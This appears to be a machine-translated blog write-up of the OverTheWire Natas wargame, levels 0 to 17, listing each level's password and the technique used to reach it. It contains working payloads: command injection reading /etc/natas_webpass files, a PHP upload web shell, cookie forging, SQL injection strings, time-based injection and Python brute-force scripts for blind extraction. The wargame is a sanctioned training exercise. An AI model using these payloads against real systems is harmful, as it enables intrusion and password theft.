当前位置:网站首页>OverTheWire-Natas
OverTheWire-Natas
2022-07-25 14:16:00 【The goal is technology house】
https://overthewire.org/wargames/natas/
natas front 17 Turn off , To be updated ~
1.natas0
F12
gtVrDuiDfck831PqWsLEZy5gyDz1clto
2.natas1
F12
ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
3.natas2
Similar path Association
F12, The path to find an image is /files/pixel.png, Therefore access /files, You can see that except pixel.png There's another one users.txt, visit users.txt Get through the password
sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
4.natas3
robots.txt
No more information leaks!! Not even Google will find it this time… This sentence gives robots.txt A hint of ,robots.txt Is a website used to work with web crawlers ( Such as Google ) Standard for communicating with other network robots , The standard specifies which areas of the website should not be processed or scanned by the notification robot .
visit robots.txt, notice Disallow: /s3cr3t/, So access this path , notice user.txt, Get the customs clearance password
Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
5.natas4
Grab the bag to modify Referer head
Make the website think that the visit is from http://natas5.natas.labs.overthewire.org/
iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
6.natas5
Catching the bag loggedin Change the field to 1
aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
7.natas6
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
visit /includes/secret.inc, obtain $secret = “FOEIUWGHFEEUHOFUOIU”; Submit secret Get the customs clearance password
7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
8.natas7
Yes hint:
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
9.natas8
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
Decrypt in order , Write a paragraph PHP
<?php
$secret = "3d3d516343746d4d6d6c315669563362";
echo base64_decode(strrev(hex2bin($secret)));
?>
obtain oubWYf2kBq And submit
W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
10.natas9
Command injection
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
According to the input key Values in dictionary.txt Search in ,passthru Function is used to execute commands , and exec The functions are similar , So use command injection
; cat /etc/natas_webpass/natas10
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
11.natas10
once grep Multiple files
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
Around ; | &, So no additional commands can be added , Only in grep Up and down , Set the matching character to ’', Can match all characters , Get all the contents of the two files
'' /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
12.natas11
forge cookie
<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = '<censored>';
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
function loadData($def) {
global $_COOKIE;
$mydata = $def;
if(array_key_exists("data", $_COOKIE)) {
$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
$mydata['showpassword'] = $tempdata['showpassword'];
$mydata['bgcolor'] = $tempdata['bgcolor'];
}
}
}
return $mydata;
}
function saveData($d) {
setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}
$data = loadData($defaultdata);
if(array_key_exists("bgcolor",$_REQUEST)) {
if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
$data['bgcolor'] = $_REQUEST['bgcolor'];
}
}
saveData($data);
?>
<?
if($data["showpassword"] == "yes") {
print "The password for natas12 is <censored><br>";
}
?>
cookie in data The value is ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw%3D, Here we have to put %3D Replace with = Number , by ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxEJaAw=
The first step is to calculate xor_encrypt Medium $key value , take $defaultdata The content in json encryption , And cookie in data Value XOR , You can get key The value is qw8J
The second step is to calculate the forged cookie:
$test1 = base64_encode(xor_encrypt(json_encode(array( "showpassword"=>"yes", "bgcolor"=>"#ffffff"))));
obtain ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
The third step , Will browser cookie Replace , Refresh the page , Get through the password
EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
13.natas12
File suffix modification
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
} else {
}
The key is to find that the uploaded file links can be accessed , So upload a jpg file , Change the suffix to php, Make it upload successfully , Then click the link to execute php.
<?php system("cat /etc/natas_pass/natas13"); ?>
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
14.natas13
exif_imagetype
else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
echo "File is not an image";
}
exif_imagetype Read the first byte of the image and check its signature . The document signature can be in https://filesignatures.net/ find out
So by uploading php Add a few bytes before as FF D8 FF E0 To bypass detection , Then grab the package and change the suffix to php
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
15.natas14
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
structure SQL Inject ,username Casually lose ,password by 1" or "1" = "1
AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
16.natas15
SQL Blind note
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysql_query($query, $link);
if($res) {
if(mysql_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysql_close($link);
} else {
?>
It also provides
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
guess username by natas16, And then explode password, If password If it is right, it will be satisfied mysql_num_rows($res) > 0. Blasting below 123 Field can be
natas16" and password = "123
The following is the reference blasting python Code . because PHP The code is from $_REQUEST Receiving parameters , So you can use GET How to submit data .
The first half of the script is for Confirm the characters contained in the password , Reduce the blasting range
import requests,string
url = "http://natas15.natas.labs.overthewire.org"
auth_username = "natas15"
auth_password = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J"
# characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
characters = ''.join([string.ascii_letters,string.digits])
# Begin by building a dictionary of characters found in the password
# This will greatly decrease the complexity for our brute force attempts
password_dictionary = []
exists_str = "This user exists."
for char in characters:
uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"%',char,'%','&debug'])
r = requests.get(uri, auth=(auth_username,auth_password))
if exists_str in r.text:
password_dictionary.append(char)
print("Password Dictionary: {0}".format(''.join(password_dictionary)))
print("Dictionary build complete.")
print("Dictionary: {0}".format(''.join(password_dictionary)))
The second half of the script starts One character one character confirmation
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1,64):
for char in password_dictionary:
test = ''.join([password,char])
# Build the GET Request
uri = ''.join([url,'?','username=natas16"','+and+password+LIKE+BINARY+"',test,'%','&debug'])
# Send the HTTP GET request to the server
r = requests.get(uri, auth=(auth_username,auth_password))
# Parse the HTTP response
if exists_str in r.text:
password_list.append(char)
password = ''.join(password_list)
print("Length: {0}, Password: {1}".format(len(password),password))
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
17.natas16
Command substitution
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
Command substitution allows the output of the command to replace the command itself . When the command is enclosed as follows , Command substitution will occur
$(command)
`command
Write a script , Replace the output result with a command . Cannot enter an empty string , So you need to keep trying characters .
If /etc/natas_webpass/natas17 No a, Internal command has no output , It will run grep whitest, obtain whitest Output ; If there is a, It will form whitestXXX, This word is not in the dictionary , Output is empty .
So if whitest Not in the output , explain /etc/natas_webpass/natas17 Contains this character .
whitest$(grep ^a /etc/natas_webpass/natas17)
The script first tests which characters it has , Then test the start character one by one .^ Indicates that it starts with the following string
import requests,string
from bs4 import BeautifulSoup
url = "http://natas16.natas.labs.overthewire.org"
auth_username = "natas16"
auth_password = "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh"
characters = ''.join([string.ascii_letters,string.digits])
password_dictionary = []
for char in characters:
uri = ''.join([url,'?','needle=whitest$(grep ',char,' /etc/natas_webpass/natas17)'])
r = requests.get(uri, auth=(auth_username,auth_password))
if "whitest" not in r.text:
password_dictionary.append(char)
print(''.join(password_dictionary))
print("Dictionary build complete.")
print("Now attempting to brute force...")
password_list = []
password = ''
for i in range(1,64):
for char in password_dictionary:
test = ''.join([password,char])
# Build the GET Request
uri = ''.join([url,'?','needle=whitest$(grep ^',test,' /etc/natas_webpass/natas17)'])
# Send the HTTP GET request to the server
r = requests.get(uri, auth=(auth_username,auth_password))
# Parse the HTTP response
if "whitest" not in r.text:
password_list.append(char)
password = ''.join(password_list)
print("Length: {0}, Password: {1}".format(len(password),password))
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
18.natas17
/* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) DEFAULT NULL ); */
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysql_query($query, $link);
if($res) {
if(mysql_num_rows($res) > 0) {
//echo "This user exists.<br>";
} else {
//echo "This user doesn't exist.<br>";
}
} else {
//echo "Error in query.<br>";
}
mysql_close($link);
Test the following input in the submit box , It is found that there is a significant delay in the return of the page , So you can use sleep Function to check whether the previous condition is true .
natas18" and sleep(5)#
边栏推荐
- einsum(): operands do not broadcast with remapped shapes [original->remapped]: [1, 144, 20, 17]->[1,
- pytorch训练代码编写技巧、DataLoader、爱因斯坦标示
- DVWA practice - brute force cracking
- Interpretation of featdepth self-monitoring model for monocular depth estimation (Part 2) -- use of openmmlab framework
- 【目录爆破工具】信息收集阶段:robots.txt、御剑、dirsearch、Dirb、Gobuster
- Oka pass rights and interests analysis is the best choice to participate in okaleido ecological construction
- The practice of depth estimation self-monitoring model monodepth2 in its own data set -- single card / multi card training, reasoning, onnx transformation and quantitative index evaluation
- Doris学习笔记之与其他系统集成
- MySQL table operation
- Two Sum
猜你喜欢
![einsum(): operands do not broadcast with remapped shapes [original->remapped]: [1, 144, 20, 17]->[1,](/img/bb/0fd0fdb7537090829f3d8df25aa59b.png)
einsum(): operands do not broadcast with remapped shapes [original->remapped]: [1, 144, 20, 17]->[1,
PS制作加载GIF图片教程
swiper 一侧或两侧露出一小部分
Mongodb source code deployment and configuration
Comprehensive sorting and summary of maskrcnn code structure process of target detection and segmentation
Okaleido ecological core equity Oka, all in fusion mining mode
Emergency science | put away this summer safety guide and let children spend the summer vacation safely!
IDEA报错 Failed to determine a suitable driver class
From Anaconda to tensorflow to jupyter, step on the pit and fill it all the way
Esp32 connects to Alibaba cloud mqtt IOT platform
随机推荐
CDA level Ⅰ 2021 new version simulation question 2 (with answers)
Realize a family security and environmental monitoring system (I)
sqli-labs Basic Challenges Less11-22
Pytorch training code writing skills, dataloader, Einstein logo
NAT/NAPT地址转换(内外网通信)技术详解【华为eNSP】
What you must know about data engineering in mlops
CDA level1 multi topic selection
Gartner 2022 top technology trend: Super automation
Dr. Berkeley's "machine learning engineering" big truth; AI vice president '2022 ml job market' analysis; Large list of semiconductor start-ups; Large scale video face attribute data set; Cutting edge
Famous handwritten note taking software recruit CTO · coordinate Shenzhen
华为ensp路由器静态路由(默认路由的下一跳地址)
力扣(LeetCode)205. 同构字符串(2022.07.24)
VS2017大型工厂ERP管理系统源码 工厂通用ERP源码
The practice of depth estimation self-monitoring model monodepth2 in its own data set -- single card / multi card training, reasoning, onnx transformation and quantitative index evaluation
telnet远程登录aaa模式详解【华为eNSP】
Experiment the Arduino code of NTP network timing alarm clock with esp32+tm1638
CTS测试介绍(面试怎么介绍接口测试)
The supply chain collaborative management system, a new "engine" of digitalization in machinery manufacturing industry, helps enterprises' refined management to a new level
新唐NUC980设置DHCP或者静态IP
Matplotlib data visualization three minutes entry, half an hour enchanted?